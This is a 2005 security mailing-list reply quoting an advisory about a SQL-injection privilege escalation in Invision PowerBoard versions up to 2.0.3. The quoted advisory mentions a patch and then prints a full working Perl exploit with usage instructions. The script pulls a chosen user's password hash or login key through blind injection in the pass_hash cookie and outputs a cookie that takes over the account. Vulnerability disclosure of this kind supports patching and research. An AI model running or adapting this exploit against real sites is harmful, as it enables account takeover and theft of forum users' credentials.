Re: [HSC Security Group] Invision PowerBoard 1.3.x - 2-x Exploit and Patch

"milw0rm Inc." <milw0rm@xxxxxxxxx> · Sat, 16 Jul 2005 19:16:12 -0500



This is a bug in <= 2.0.3 not 2.*.

/str0ke

On 16 Jul 2005 18:25:35 -0000, zinho@xxxxxxxxxxxxxxxxx
<zinho@xxxxxxxxxxxxxxxxx> wrote:
> Hackers Center Security Group (http://www.hackerscenter.com/)
> Zinho's Security Advisory
> 
> Desc: Invision PowerBoard 1.3.x - 2.x Privilege escalation through SQL injection
> Risk: High
> 
> 
> hacky0u from http://www.h4cky0u.org kindly reported to me an exploit working against 1.3.x and 2.x versions of Invision Power board.
> 
> I've coded a quickfix to patch it:
> http://www.hackerscenter.com/archive/view.asp?id=3812
> 
> 
> 
> This is the exploit (Full credit to h4cky0u for it):
> #!/usr/bin/perl -w
> 
> ##################################################################
> # This one actually works :) Just paste the outputted cookie into
> # your request header using livehttpheaders or something and you
> # will probably be logged in as that user. No need to decrypt it!
> # Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org
> ##################################################################
> 
> use LWP::UserAgent;
> 
> $ua = new LWP::UserAgent;
> $ua->agent("Mosiac 1.0" . $ua->agent);
> 
> if (!$ARGV[0]) {$ARGV[0] = '';}
> if (!$ARGV[3]) {$ARGV[3] = '';}
> 
> my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
> my $user = $ARGV[1]; # userid to jack
> my $iver = $ARGV[2]; # version 1 or 2
> my $cpre = $ARGV[3]; # cookie prefix
> my $dbug = $ARGV[4]; # debug?
> 
> if (!$ARGV[2])
> {
> print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2]. ";
> exit;
> }
> 
> my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
> 
> my $outputs = '';
> 
> for( $i=1; $i < 33; $i++ )
> {
> for( $j=0; $j < 16; $j++ )
> {
> my $current = $charset[$j];
> my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
> "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
> my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
> my $res = $ua->get($path, @cookie);
> 
> # If we get a valid sql request then this
> # does not appear anywhere in the sources
> $pattern = '<title>(.*)Log In(.*)</title>';
> 
> $_ = $res->content;
> 
> if ($dbug) { print };
> 
> if ( !(/$pattern/) )
> {
> $outputs .= $current;
> print "$current ";
> last;
> }
> 
> }
> if ( length($outputs) < 1 ) { print "Not Exploitable! "; exit; }
> }
> print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
> exit;
> 
> # www.h4cky0u.org
>